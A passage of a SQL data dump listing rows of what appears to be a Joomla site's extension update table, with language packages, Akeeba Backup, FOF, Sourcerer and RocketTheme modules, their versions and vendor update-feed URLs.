US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22712,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22713,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22714,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22715,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22716,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22717,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22718,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22719,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22720,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22721,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22722,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22723,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22724,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22725,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22726,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22727,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22728,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22729,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22730,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22731,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22732,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22733,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22734,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22735,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22736,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22737,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(22738,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(22739,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22741,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22742,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22743,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22744,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22745,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22746,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22747,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(22748,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22749,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22750,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22751,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22752,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22753,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22754,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22755,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22756,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22757,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22758,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22759,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22760,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22761,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22762,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22763,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22764,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22765,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22766,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22767,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22768,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22769,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22770,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22771,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22772,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22773,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22774,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22775,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22776,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22777,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22778,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22779,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22780,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22781,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22782,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22783,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22784,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22785,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22786,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22787,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22788,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22789,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22790,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22791,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22792,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22793,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22794,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22795,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22796,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22797,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22798,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22799,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22800,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(22801,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(22802,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(22803,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(22804,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(22805,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(22806,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(22807,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(22808,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(22809,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22810,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22811,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22812,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22813,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22814,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22815,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22816,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22817,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22818,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22819,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22820,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22821,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22822,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22823,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22824,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22825,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22826,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22827,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22828,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22829,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22830,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22831,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22832,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22833,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22834,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22835,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22836,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22837,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22838,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22839,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22840,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22841,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22842,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22843,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22844,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22845,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22846,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22847,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22848,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22849,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22850,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22851,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22852,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22853,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22854,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22855,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22856,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22857,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22858,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(22859,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(22860,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(22861,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22862,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22863,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(22864,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22865,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22866,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22867,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22868,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(22869,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22870,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22871,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22872,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22873,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22874,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22875,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22876,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22877,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22878,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22879,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22880,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22881,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22882,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22883,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22884,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22885,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22886,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22887,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22888,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22889,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22890,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22891,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22892,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22893,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22894,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22895,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22896,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22897,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22898,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22899,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22900,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22901,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22902,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22903,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22904,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22905,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22906,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22907,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22908,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22909,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22910,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22911,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22912,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22913,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22914,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22915,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22916,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22917,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22918,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22919,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22920,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(22921,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(22922,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(22923,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(22924,20,0,'RokCandy 